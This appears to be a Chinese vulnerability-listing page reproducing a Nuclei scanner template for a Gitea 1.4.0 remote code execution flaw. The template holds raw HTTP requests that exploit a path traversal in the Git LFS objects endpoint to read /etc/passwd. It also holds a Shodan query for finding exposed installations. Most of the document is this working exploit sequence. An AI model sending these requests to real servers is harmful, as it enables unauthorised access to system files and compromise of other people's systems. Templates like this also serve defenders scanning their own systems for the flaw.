漏洞描述
Gitea 1.4.0 is vulnerable to remote code execution.
gitea-rce: Gitea 1.4.0 - Remote Code Execution
PoC代码[已公开]
id: gitea-rce
info:
name: Gitea 1.4.0 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Gitea 1.4.0 is vulnerable to remote code execution.
reference:
- https://www.exploit-db.com/exploits/44996
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
classification:
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: gitea
product: gitea
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
tags: gitea,rce,unauth,edb
http:
- raw:
- |
GET /api/v1/repos/search?limit=1 HTTP/1.1
Host: {{Hostname}}
- |
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/vnd.git-lfs+json
{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "{{randstr}}",
"Password" : "{{randstr}}",
"Repo" : "{{randstr}}",
"Authorization" : "{{randstr}}"
}
- |
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: word
part: header_3
words:
- "application/octet-stream"
extractors:
- type: regex
name: repo
group: 1
regex:
- '"name":".*","full_name":"(.*)","description"'
internal: true
# digest: 4a0a0047304502206752dff41b474bdaae2c0db7bf5e126a08ff3ad9f1a8ac11556a425872336192022100de046570a911e7f2c6f8925ba491aea541dba94610475d648fd1910217cff20d:922c64590222798bb761d5b6d8e72950